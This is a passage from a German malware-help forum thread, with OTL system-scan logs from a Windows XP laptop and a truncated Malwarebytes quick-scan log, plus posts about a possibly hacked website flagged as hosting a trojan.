[2008.04.14 04:23:08 | 000,207,360 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp

[4 C:\Windows\system32\*.tmp files -> C:\Windows\system32\*.tmp -> ]

 
 < MD5 for: AGP440.SYS  >

[2004.08.04 14:00:00 | 018,782,319 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys

[2012.03.26 11:22:00 | 023,898,261 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys

[2012.03.26 11:22:00 | 023,898,261 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:AGP440.sys

[2008.04.13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys

[2008.04.13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys

 
 < MD5 for: ATAPI.SYS  >

[2004.08.04 14:00:00 | 018,782,319 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys

[2012.03.26 11:22:00 | 023,898,261 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys

[2012.03.26 11:22:00 | 023,898,261 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys

[2008.04.13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys

[2008.04.13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys

[2004.08.04 14:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\system32\ReinstallBackups\0007\DriverFiles\i386\atapi.sys

[2004.08.03 23:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\system32\ReinstallBackups\0008\DriverFiles\i386\atapi.sys

 
 < MD5 for: EVENTLOG.DLL  >

[2008.04.14 04:22:10 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=04955AA695448C181B367D964AF158AA -- C:\WINDOWS\ServicePackFiles\i386\eventlog.dll

[2008.04.14 04:22:10 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=04955AA695448C181B367D964AF158AA -- C:\WINDOWS\system32\eventlog.dll

 
 < MD5 for: EXPLORER.EXE  >

[2008.04.14 04:22:45 | 001,036,800 | ---- | M] (Microsoft Corporation) MD5=418045A93CD87A352098AB7DABE1B53E -- C:\WINDOWS\explorer.exe

[2008.04.14 04:22:45 | 001,036,800 | ---- | M] (Microsoft Corporation) MD5=418045A93CD87A352098AB7DABE1B53E -- C:\WINDOWS\ServicePackFiles\i386\explorer.exe

[2008.04.29 17:42:08 | 000,090,624 | ---- | M] () MD5=FBB39A4487E11F64DCFFD36AEC2D2216 -- C:\Programme\CheckPoint\ZAForceField\Heuristics\explorer.exe

 
 < MD5 for: NETLOGON.DLL  >

[2008.04.14 04:22:19 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=0098D35F91DEAB9C127360A877F2CF84 -- C:\WINDOWS\ServicePackFiles\i386\netlogon.dll

[2008.04.14 04:22:19 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=0098D35F91DEAB9C127360A877F2CF84 -- C:\WINDOWS\system32\netlogon.dll

[2009.02.06 20:46:10 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=ED4BBAD725A21632FB205452749FC8F5 -- C:\WINDOWS\$hf_mig$\KB968389\SP2QFE\netlogon.dll

[2009.02.06 20:46:10 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=ED4BBAD725A21632FB205452749FC8F5 -- C:\WINDOWS\$hf_mig$\KB975467\SP2QFE\netlogon.dll

 
 < MD5 for: SCECLI.DLL  >

[2008.04.14 04:22:23 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=5132443DF6FC3771A17AB4AE55DCBC28 -- C:\WINDOWS\ServicePackFiles\i386\scecli.dll

[2008.04.14 04:22:23 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=5132443DF6FC3771A17AB4AE55DCBC28 -- C:\WINDOWS\system32\scecli.dll

 
 < MD5 for: USER32.DLL  >

[2008.04.14 04:22:31 | 000,580,096 | ---- | M] (Microsoft Corporation) MD5=B0050CC5340E3A0760DD8B417FF7AEBD -- C:\WINDOWS\ServicePackFiles\i386\user32.dll

[2008.04.14 04:22:31 | 000,580,096 | ---- | M] (Microsoft Corporation) MD5=B0050CC5340E3A0760DD8B417FF7AEBD -- C:\WINDOWS\system32\user32.dll

 
 < MD5 for: USERINIT.EXE  >

[2008.04.14 04:23:03 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=788F95312E26389D596C0FA55834E106 -- C:\WINDOWS\ServicePackFiles\i386\userinit.exe

[2008.04.14 04:23:03 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=788F95312E26389D596C0FA55834E106 -- C:\WINDOWS\system32\userinit.exe

 
 < MD5 for: WINLOGON.EXE  >

[2012.09.07 17:04:42 | 000,218,696 | ---- | M] () MD5=4E0D8C9F83B7FD82393F7D8CCC27E7AE -- C:\Programme\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe

[2008.04.14 04:23:05 | 000,513,024 | ---- | M] (Microsoft Corporation) MD5=F09A527B422E25C478E38CAA0E44417A -- C:\WINDOWS\ServicePackFiles\i386\winlogon.exe

[2008.04.14 04:23:05 | 000,513,024 | ---- | M] (Microsoft Corporation) MD5=F09A527B422E25C478E38CAA0E44417A -- C:\WINDOWS\system32\winlogon.exe

[2008.07.01 15:17:12 | 000,090,624 | ---- | M] () MD5=FBB39A4487E11F64DCFFD36AEC2D2216 -- C:\Programme\CheckPoint\ZAForceField\Heuristics\winlogon.exe

 
 < MD5 for: WS2IFSL.SYS  >

[2004.08.04 14:00:00 | 000,012,032 | ---- | M] (Microsoft Corporation) MD5=6ABE6E225ADB5A751622A9CC3BC19CE8 -- C:\WINDOWS\system32\dllcache\ws2ifsl.sys

[2004.08.04 14:00:00 | 000,012,032 | ---- | M] (Microsoft Corporation) MD5=6ABE6E225ADB5A751622A9CC3BC19CE8 -- C:\WINDOWS\system32\drivers\ws2ifsl.sys

 
 < %systemroot%\system32\drivers\*.sys /lockedfiles >

[1 C:\WINDOWS\system32\drivers\*.tmp files -> C:\WINDOWS\system32\drivers\*.tmp -> ]

 
 < %systemroot%\System32\config\*.sav >

[2012.03.24 11:24:52 | 000,094,208 | ---- | M] () -- C:\WINDOWS\System32\config\default.sav

[2012.03.24 11:24:52 | 000,663,552 | ---- | M] () -- C:\WINDOWS\System32\config\software.sav

[2012.03.24 11:24:52 | 000,466,944 | ---- | M] () -- C:\WINDOWS\System32\config\system.sav

 
 < %systemroot%\system32\*.dll /lockedfiles >

[4 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

 
 < %USERPROFILE%\*.* >

[2012.09.12 11:19:36 | 008,388,608 | -H-- | M] () -- C:\Dokumente und Einstellungen\Admin\NTUSER.DAT

[2012.09.12 15:39:24 | 000,001,024 | -H-- | M] () -- C:\Dokumente und Einstellungen\Admin\ntuser.dat.LOG

[2012.03.25 12:48:40 | 000,000,000 | -H-- | M] () -- C:\Dokumente und Einstellungen\Admin\NTUSER.DAT_tureg_new.LOG

[2012.04.03 17:43:09 | 006,815,744 | -H-- | M] () -- C:\Dokumente und Einstellungen\Admin\NTUSER.DAT_tureg_old

[2012.09.12 11:19:31 | 000,000,190 | -HS- | M] () -- C:\Dokumente und Einstellungen\Admin\ntuser.ini

[2012.03.25 12:15:07 | 000,002,042 | ---- | M] () -- C:\Dokumente und Einstellungen\Admin\voipstunt[0].log

 
 < %USERPROFILE%\Local Settings\Temp\*.exe >

 
 < %USERPROFILE%\Local Settings\Temp\*.dll >

 
 < %USERPROFILE%\Application Data\*.exe >

 
 < HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs >

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Kmode: %SystemRoot%\system32\win32k.sys [2012.07.03 20:25:08 | 001,866,240 | ---- | M] (Microsoft Corporation)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
 

< End of report >

--- --- ---

extras.text
OTL Logfile:

Code:

OTL Extras logfile created on: 12.09.2012 15:31:26 - Run 1

OTL by OldTimer - Version 3.2.61.3     Folder = C:\Dokumente und Einstellungen\Admin\Desktop\arge

Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation

Internet Explorer (Version = 8.0.6001.18702)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

 

1,99 Gb Total Physical Memory | 1,50 Gb Available Physical Memory | 75,31% Memory free

3,84 Gb Paging File | 3,49 Gb Available in Paging File | 90,91% Paging File free

Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

 

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme

Drive C: | 127,99 Gb Total Space | 113,83 Gb Free Space | 88,94% Space Free | Partition Type: NTFS

Drive D: | 104,89 Gb Total Space | 104,60 Gb Free Space | 99,72% Space Free | Partition Type: NTFS

 

Computer Name: BLA-3443EB72419 | User Name: Admin | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

 
 ========== Extra Registry (SafeList) ==========

 

 
 ========== File Associations ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*

 

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]

.html [@ = FirefoxHTML] -- C:\Dokumente und Einstellungen\Admin\Desktop\Firefox_Potable\FirefoxPortable\App\Firefox\firefox.exe (Mozilla Corporation)

 
 ========== Shell Spawning ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*

exefile [open] -- "%1" %*

http [open] -- Reg Error: Key error.

https [open] -- Reg Error: Key error.

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [AddToPlaylistVLC] -- "C:\Programme\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Directory [PlayWithVLC] -- "C:\Programme\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()

Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)

Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

 
 ========== Security Center Settings ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"FirstRunDisabled" = 1

"AntiVirusDisableNotify" = 0

"FirewallDisableNotify" = 0

"UpdatesDisableNotify" = 0

"AntiVirusOverride" = 0

"FirewallOverride" = 0

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

"DisableMonitoring" = 1

 
 ========== System Restore Settings ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]

"DisableSR" = 0

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]

"Start" = 0

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]

"Start" = 2

 
 ========== Firewall Settings ==========

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

"EnableFirewall" = 1

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

"EnableFirewall" = 1

 
 ========== Authorized Applications List ==========

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

"F:\backup-laptop-neu-wichtig\VoipStunt\voipstunt.exe" = F:\backup-laptop-neu-wichtig\VoipStunt\voipstunt.exe:*:Enabled:VoipStunt

"C:\Programme\VoipStunt\voipstunt.exe" = C:\Programme\VoipStunt\voipstunt.exe:*:Enabled:VoipStunt -- (VoipStunt)

 

 
 ========== HKEY_LOCAL_MACHINE Uninstall List ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{02E89EFC-7B07-4D5A-AA03-9EC0902914EE}" = VC 9.0 Runtime

"{1111706F-666A-4037-7777-203328764D10}" = JavaFX 2.0.3

"{1545207E-C6F3-31D7-9918-BDBB65075FBF}" = Microsoft .NET Framework 3.5 Language Pack - deu

"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

"{2222706F-666A-4037-7777-203328764D10}" = JavaFX 2.0.3 SDK

"{23FB368F-1399-4EAC-817C-4B83ECBE3D83}" = mProSafe

"{24C152B6-544C-4B64-A4CA-575843C0CFE6}" = Article Wizard

"{26A24AE4-039D-4CA4-87B4-2F83217003FF}" = Java(TM) 7 Update 3

"{32364CEA-7855-4A3C-B674-53D8E9B97936}" = TuneUp Utilities 2012

"{32A3A4F4-B792-11D6-A78A-00B0D0170030}" = Java(TM) SE Development Kit 7 Update 3

"{334799B1-527F-475B-AF19-658124E2BE24}" = ZoneAlarm Security

"{350C97B3-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP

"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater

"{4D826618-59C6-11D4-976E-00C04F8EEB39}" = Macromedia FreeHand 10

"{59F6A514-9813-47A3-948C-8A155460CC2A}" = RICOH R5C83x/84x Flash Media Controller Driver Ver.3.32

"{62715632-A555-4D9E-9CEC-4F84EB55B07B}" = PM Driver

"{63E949F6-03BC-5C40-FF1F-C8B3B9A1E18E}" = Visual C++ 8.0 CRT.Policy (x86) WinSXS MSM

"{77C1B8D7-1283-48A4-BD79-79FA37064A13}" = Lenovo Fingerprint Software

"{84814E6B-2581-46EC-926A-823BD1C670F6}" = Lenovo Bluetooth with Enhanced Data Rate Software

"{8B928BA1-EDEC-4227-A2DA-DD83026C36F5}" = mPfMgr

"{90120000-0010-0407-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders  (German) 12

"{90120000-0015-0407-0000-0000000FF1CE}" = Microsoft Office Access MUI (German) 2007

"{90120000-0016-0407-0000-0000000FF1CE}" = Microsoft Office Excel MUI (German) 2007

"{90120000-0018-0407-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (German) 2007

"{90120000-0019-0407-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (German) 2007

"{90120000-001A-0407-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (German) 2007

"{90120000-001B-0407-0000-0000000FF1CE}" = Microsoft Office Word MUI (German) 2007

"{90120000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2007

"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007

"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007

"{90120000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2007

"{90120000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2007

"{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007

"{90120000-0044-0407-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (German) 2007

"{90120000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2007

"{90120000-00A1-0407-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (German) 2007

"{90120000-00B2-0407-0000-0000000FF1CE}" = Microsoft – Speichern als PDF oder XPS – Add-In für 2007 Microsoft Office-Programme

"{90120000-00BA-0407-0000-0000000FF1CE}" = Microsoft Office Groove MUI (German) 2007

"{9309DD7E-EBFE-3C95-8B47-30D3A012F606}" = Microsoft .NET Framework 2.0 Service Pack 1 Language Pack - DEU

"{98CB24AD-52FB-DB5F-FF1F-C8B3B9A1E18E}" = Visual C++ 8.0 CRT (x86) WinSXS MSM

"{9CC89556-3578-48DD-8408-04E66EBEF401}" = mXML

"{A0F925BF-5C55-44C2-A4E7-5A4C59791C29}" = mDriver

"{A1071AEB-B0EF-3F5F-BC84-83A270EBE496}" = Microsoft .NET Framework 3.0 Service Pack 1 Language Pack - DEU

"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2

"{A52A504E-18BE-4821-9A2A-BFB4542DA0BD}" = Lenovo PM Driver

"{AC76BA86-7AD7-1031-7B44-AA1000000001}" = Adobe Reader X (10.1.2) - Deutsch

"{AD799836-6B74-419B-A869-C326CA86ECCF}" = ZoneAlarm Firewall

"{B6CF2967-C81E-40C0-9815-C05774FEF120}" = Skype Click to Call

"{BCE46757-7674-4416-BEDB-68205A60409E}" = Canon CanoScan Toolbox 4.1

"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2

"{C99C0593-3B48-41D9-B42F-6E035B320449}" = Broadcom Management Programs

"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware

"{CE026CFE-73FE-4FED-9D5F-2C8D4DB512B0}" = TuneUp Utilities Language Pack (de-DE)

"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1

"{D3B3B9B2-FE73-44CB-8C0A-F737D92F991B}" = Broadcom Gigabit Integrated Controller

"{E81667C6-2856-46D6-ABEA-6A2F42166779}" = mCore

"{EE7257A2-39A2-4D2F-9DAC-F9F25B8AE1D8}" = Skype™ 5.10

"{F0BFC7EF-9CF8-44EE-91B0-158884CD87C5}" = mMHouse

"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver

"{FCA651F3-5BDA-4DDA-9E4A-5D87D6914CC4}" = mWlsSafe

"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin

"Adobe Photoshop 7.0" = Adobe Photoshop 7.0

"Agere Systems Soft Modem" = Agere Systems HDA Modem

"avast" = avast! Free Antivirus

"Broadcom 802.11b Network Adapter" = Broadcom 802.11 Network Adapter

"Elster-Export Plugin für EasyCash&Tax_is1" = Elster-Export 1.10

"ENTERPRISE" = Microsoft Office Enterprise 2007

"HDMI" = Intel(R) Graphics Media Accelerator Driver

"ie8" = Windows Internet Explorer 8

"InstallShield_{62715632-A555-4D9E-9CEC-4F84EB55B07B}" = PM Driver

"LENOVO.SMIIF" = Lenovo System Interface Driver

"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware Version 1.65.0.1400

"Microsoft .NET Framework 3.5 Language Pack - deu" = Microsoft .NET Framework 3.5 Language Pack - DEU

"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1

"Mobile Partner" = Mobile Partner

"nbi-nb-base-7.1.1.0.0" = NetBeans IDE 7.1.1

"Notepad++" = Notepad++

"OptionPCCardInstaller" = 'Option PC Cards driver package'

"OptionPluss_PCCardInstaller" = Option GT HSDPA driver suite

"ProInst" = Intel(R) PROSet/Wireless Software

"sem_GCXX" = Sony Ericsson GCXX (75/79/82/83/85/89)

"SynTPDeinstKey" = Synaptics Pointing Device Driver

"TuneUp Utilities 2012" = TuneUp Utilities 2012

"VLC media player" = VLC media player 2.0.1

"Wdf01007" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.7

"WinRAR archiver" = WinRAR 4.11 (32-Bit)

"XpsEPSC" = XML Paper Specification Shared Components Pack 1.0

"XPSEPSCLP" = XML Paper Specification Shared Components Language Pack 1.0

"ZoneAlarm Free Firewall" = ZoneAlarm Free Firewall

 
 ========== Last 20 Event Log Errors ==========

 

[ Application Events ]

Error - 09.09.2012 17:46:29 | Computer Name = BLA-3443EB72419 | Source = Application Error | ID = 1000

Description = Fehlgeschlagene Anwendung SpywareTerminator.exe, Version 3.0.0.80,

 fehlgeschlagenes Modul ntdll.dll, Version 5.1.2600.6055, Fehleradresse 0x000141da.

 

Error - 09.09.2012 17:53:47 | Computer Name = BLA-3443EB72419 | Source = Application Error | ID = 1000

Description = Fehlgeschlagene Anwendung SpywareTerminator.exe, Version 3.0.0.80,

 fehlgeschlagenes Modul ntdll.dll, Version 5.1.2600.6055, Fehleradresse 0x000141da.

 

Error - 09.09.2012 17:54:37 | Computer Name = BLA-3443EB72419 | Source = Application Error | ID = 1000

Description = Fehlgeschlagene Anwendung SpywareTerminator.exe, Version 3.0.0.80,

 fehlgeschlagenes Modul ntdll.dll, Version 5.1.2600.6055, Fehleradresse 0x000141da.

 

Error - 12.09.2012 03:02:42 | Computer Name = BLA-3443EB72419 | Source = Application Hang | ID = 1002

Description = Stillstehende Anwendung Shredder.exe, Version 12.0.3600.73, Stillstandmodul

 hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.

 

Error - 12.09.2012 03:02:58 | Computer Name = BLA-3443EB72419 | Source = Application Hang | ID = 1002

Description = Stillstehende Anwendung Shredder.exe, Version 12.0.3600.73, Stillstandmodul

 hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.

 

Error - 12.09.2012 05:03:04 | Computer Name = BLA-3443EB72419 | Source = Application Hang | ID = 1002

Description = Stillstehende Anwendung mbam.exe, Version 1.62.0.140, Stillstandmodul

 hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.

 

Error - 12.09.2012 09:30:09 | Computer Name = BLA-3443EB72419 | Source = Application Error | ID = 1000

Description = Fehlgeschlagene Anwendung notepad.exe, Version 5.1.2600.5512, fehlgeschlagenes

 Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x00009de9.

 

Error - 12.09.2012 09:30:15 | Computer Name = BLA-3443EB72419 | Source = Application Error | ID = 1000

Description = Fehlgeschlagene Anwendung notepad.exe, Version 5.1.2600.5512, fehlgeschlagenes

 Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x00009de9.

 

Error - 12.09.2012 09:30:35 | Computer Name = BLA-3443EB72419 | Source = Application Hang | ID = 1002

Description = Stillstehende Anwendung OTL.exe, Version 3.2.61.3, Stillstandmodul

 hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.

 

Error - 12.09.2012 09:30:40 | Computer Name = BLA-3443EB72419 | Source = Application Error | ID = 1000

Description = Fehlgeschlagene Anwendung notepad.exe, Version 5.1.2600.5512, fehlgeschlagenes

 Modul user32.dll, Version 5.1.2600.5512, Fehleradresse 0x00009de9.

 

[ System Events ]

Error - 11.09.2012 09:55:41 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7009

Description = Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst Mobile

 Partner. OUC.

 

Error - 11.09.2012 09:55:41 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7000

Description = Der Dienst "Mobile Partner. OUC" wurde aufgrund folgenden Fehlers 

nicht gestartet:   %%1053

 

Error - 11.09.2012 09:58:15 | Computer Name = BLA-3443EB72419 | Source = sr | ID = 1

Description = Beim Verarbeiten der Datei "change.log" auf Volume "HarddiskVolume3"

 ist im Wiederherstellungsfilter der unerwartete Fehler "0xC0000010" aufgetreten.

 Die Volumeüberwachung wurde angehalten.

 

Error - 11.09.2012 13:21:16 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7009

Description = Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst Mobile

 Partner. OUC.

 

Error - 11.09.2012 13:21:16 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7000

Description = Der Dienst "Mobile Partner. OUC" wurde aufgrund folgenden Fehlers 

nicht gestartet:   %%1053

 

Error - 11.09.2012 17:13:37 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7009

Description = Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst Mobile

 Partner. OUC.

 

Error - 11.09.2012 17:13:37 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7000

Description = Der Dienst "Mobile Partner. OUC" wurde aufgrund folgenden Fehlers 

nicht gestartet:   %%1053

 

Error - 12.09.2012 01:52:31 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7009

Description = Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst Mobile

 Partner. OUC.

 

Error - 12.09.2012 01:52:31 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7000

Description = Der Dienst "Mobile Partner. OUC" wurde aufgrund folgenden Fehlers 

nicht gestartet:   %%1053

 

Error - 12.09.2012 02:29:40 | Computer Name = BLA-3443EB72419 | Source = Service Control Manager | ID = 7034

Description = Dienst "DNS-Client" wurde unerwartet beendet. Dies ist bereits 1 Mal

 passiert.

 

 

< End of report >

--- --- ---

[/code]

lg

hi
1. öffne mal malwarebytes, berichte, poste logs mit funden.
2. ist die seite im moment offline, bekomme ne test1 seite wenn ich drauf gehe

Hi,

1. malwarebytes hängt sich bei einem vollständigen Scan immer auf - was tun ?
2. Ich hatte die webseite mit diversen Seiten wie urlvoid überprüft, und da kam die Fehlermeldung : Trojaner. Daher habe ich die heruntergenommen und eine test.html aufgespielt.
3. Wenn die Seite gehackt wurde, wie würdest du den weiteren Ablauf empfehlen
4. Ich habe Datenbank Backups, wie kann ich überprüfen, dass die nicht schon befallen waren - Wonach muss ich dort suchen ?

Resultat Quickscan:

Code:



Malwarebytes Anti-Malware (Test) 1.65.0.1400

www.malwarebytes.org
 

Datenbank Version: v2012.09.13.02
 

Windows XP Service Pack 3 x86 NTFS

Internet Explorer 8.0.6001.18702

Admin :: BLA-3443EB72419 [Administrator]
 

Schutz: Deaktiviert
 

13.09.2012 09:54:48

mbam-log-2012-09-13 (09-54-48).txt
 

Art des Suchlaufs: Quick-Scan

Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM

Deaktivierte Suchlaufeinstellungen: P2P

Durchsuchte Objekte: 188014

Laufzeit: 3 Minute(n), 18 Sekunde(n)
 

Infizierte Speicherprozesse: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Speichermodule: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Registrierungsschlüssel: 0

